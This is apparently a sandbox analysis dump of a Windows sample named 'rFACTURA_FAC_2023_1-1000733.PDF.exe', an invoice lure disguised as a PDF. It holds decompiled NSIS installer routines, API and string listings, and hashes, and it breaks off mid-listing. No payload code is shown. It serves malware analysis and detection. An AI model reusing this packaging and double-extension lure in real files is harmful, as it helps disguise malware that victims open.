				_t22 = E00406639(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f20;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040612D(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f20, 0);
					__eflags =  *0x7a1f20;
					if(__eflags == 0) {
						E0040612D(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x7a1f20, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004061A6(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C43(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated";
				 *0x7a8ac0 =  *0x7a8a3c & 0x00000020;
				 *0x7a8adc = 0x10000;
				if(E00405C38(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") != 0) {
					L16:
					if(E00405C38(_t98, _t86) == 0) {
						E00406281(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8a20, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x7a7a08 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C43(_t78, __eflags);
							__eflags =  *0x7a8ae0;
							if( *0x7a8ae0 != 0) {
								_t33 = E00405396(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x7a79ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f00, 5); // executed
							_t39 = E004065C9("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065C9("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a79c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a79c0);
								 *0x7a79e4 = _t87;
								RegisterClassW(0x7a79c0);
							}
							_t41 =  *0x7a7a00; // 0x0
							_t44 = DialogBoxParamW( *0x7a8a20, _t41 + 0x00000069 & 0x0000ffff, 0, E00403D1B, 0); // executed
							E004038BD(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a20;
						 *0x7a79c4 = E00401000;
						 *0x7a79d0 =  *0x7a8a20;
						 *0x7a79d4 = _t30;
						 *0x7a79e4 = 0x40a380;
						if(RegisterClassW(0x7a79c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f00 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a20, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a69c0;
					E0040612D(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69c0, 0);
					_t63 =  *0x7a69c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a69c2;
						 *((short*)(E00405B5D(0x7a69c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040625F(_t86, E00405B30(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B7C(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403973
0x0040397c
0x00403983
0x00403985
0x00403999
0x004039ab
0x004039b4
0x004039bd
0x004039c4
0x004039c9
0x004039d0
0x004039e3
0x004039e3
0x004039ee
0x00403987
0x00403992
0x00403992
0x004039f3
0x004039fd
0x00403a06
0x00403a0b
0x00403a1c
0x00403aae
0x00403ab6
0x00403abf
0x00403abf
0x00403ad5
0x00403adb
0x00403ae9
0x00403b6a
0x00403b72
0x00403b7c
0x00403b81
0x00403b87
0x00403c11
0x00403c16
0x00403c18
0x00403c34
0x00000000
0x00403c34
0x00403c1a
0x00403c20
0x00403c28
0x00403c28
0x00000000
0x00403c20
0x00403b95
0x00403ba0
0x00403ba5
0x00403ba7
0x00403bae
0x00403bae
0x00403bb9
0x00403bc1
0x00403bc3
0x00403bc5
0x00403bce
0x00403bd1
0x00403bd7
0x00403bd7
0x00403bdd
0x00403bf6
0x00403c07
0x00000000
0x00403c0c
0x00403b74
0x00403b76
0x00000000
0x00403aeb
0x00403aeb
0x00403af7
0x00403b01
0x00403b07
0x00403b0c
0x00403b1b
0x00403c39
0x00403c39
0x00000000
0x00403c39
0x00403b2a
0x00403b65
0x00000000
0x00403b65
0x00403a22
0x00403a22
0x00403a25
0x00403a27
0x00000000
0x00000000
0x00403a35
0x00403a47
0x00403a4c
0x00403a55
0x00000000
0x00000000
0x00403a5b
0x00403a5d
0x00403a6a
0x00403a6a
0x00403a73
0x00403a79
0x00403aa1
0x00403aa9
0x00000000
0x00403a8b
0x00403a8c
0x00403a95
0x00403a9b
0x00403a9c
0x00000000
0x00403a9c
0x00403a97
0x00403a99
0x00000000
0x00000000
0x00000000
0x00403a99
0x00403a79

APIs

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

lstrcatW.KERNEL32(1033,007A1F20), ref: 004039EE
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated), ref: 00403AD5

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

RegisterClassW.USER32(007A79C0), ref: 00403B12
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
ShowWindow.USER32(00000005,00000000), ref: 00403B95
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
RegisterClassW.USER32(007A79C0), ref: 00403BD7
DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6

Strings

RichEdit, xrefs: 00403BC8
Call, xrefs: 00403A35, 00403A3E, 00403A4C, 00403A9B, 00403AA1
RichEdit20W, xrefs: 00403BB9, 00403BBF
RichEd20, xrefs: 00403B9B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 004039FD, 00403A05, 00403AA8, 00403AAE, 00403ABE
.DEFAULT\Control Panel\International, xrefs: 004039D9
Control Panel\Desktop\ResourceLocale, xrefs: 004039A1
1033, xrefs: 0040398D, 004039E9
RichEd32, xrefs: 00403BA9
"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 00403971
_Nb, xrefs: 00403AF1, 00403B59
.exe, xrefs: 00403A7B

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1264306497
Opcode ID: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
Opcode Fuzzy Hash: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe";
				 *0x7a8a30 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe", 0x400);
				_t89 = E00405D51(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040625F(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040625F(0x7b7000, E00405B7C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7976dc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D("true");
					__eflags =  *0x7a8a38 - _t82;
					if( *0x7a8a38 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403308( *0x7a8a38 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a34 = _t94;
							 *0x7a8a3c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a40 =  *0x7a8a40 + 1;
								__eflags =  *0x7a8a40;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D0C(0x7a8a60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403308( *0x78b6d4);
					_t65 = E004032F2( &_a4, "true");
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a38) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032F2(0x7976e0, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D("true");
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a38;
						if( *0x7a8a38 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D0C( &_v44, 0x7976e0, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78b6d4; // 0x674f5
						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a38 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7976dc; // 0x69700
						if(__eflags < 0) {
							_v12 = E0040672C(_v12, 0x7976e0, _t90);
						}
						 *0x78b6d4 =  *0x78b6d4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

soft, xrefs: 00402FAF
"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 00402EC1
Inst, xrefs: 00402FA6
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
Null, xrefs: 00402FB8
vy, xrefs: 00402F4F
Error launching installer, xrefs: 00402F11
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-289341765
Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00406281(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				intOrPtr _t94;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t94 =  *0x7a79fc; // 0xb8007e
					_t43 =  *(_t94 - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x7a8a78 + _t43 * 2;
				_t44 = 0x7a69c0;
				_t110 = 0x7a69c0;
				if(_a4 >= 0x7a69c0 && _a4 - 0x7a69c0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406281(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x7a69c0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x7a9000;
							E0040625F(_t110, (_t106 << 0xb) + 0x7a9000);
						} else {
							E004061A6(_t110,  *0x7a8a28);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064F3(_t110);
						}
						goto L43;
					}
					_t86 =  *0x7a8a2c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x7a8ac4;
						if( *0x7a8ac4 != 0) {
							_push("true");
							_pop(_t108);
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x7a8a24;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040612D( *0x7a8a78, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406281(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040625F(_a4, _t44);
			}

0x00406281
0x00406281
0x00406281
0x00406287
0x0040628c
0x0040628e
0x0040629d
0x0040629d
0x004062a5
0x004062a6
0x004062a7
0x004062a8
0x004062ab
0x004062b3
0x004062b5
0x004062ce
0x004062d1
0x004062d1
0x004064cd
0x004064cd
0x004064d3
0x00000000
0x00000000
0x004062e1
0x004062e7
0x00000000
0x00000000
0x004062ef
0x004062f0
0x004062f2
0x004062f6
0x004062f9
0x004064ba
0x004064c8
0x004064cb
0x004064cb
0x004064bc
0x004064bf
0x004064c2
0x004064c4
0x004064c4
0x00000000
0x004064ba
0x004062ff
0x00406302
0x00406311
0x00406318
0x00406322
0x00406326
0x00406329
0x0040632c
0x00406331
0x00406336
0x0040633a
0x0040633d
0x0040645d
0x00406461
0x00406494
0x00406498
0x0040649d
0x004064a2
0x004064a2
0x004064a7
0x004064a8
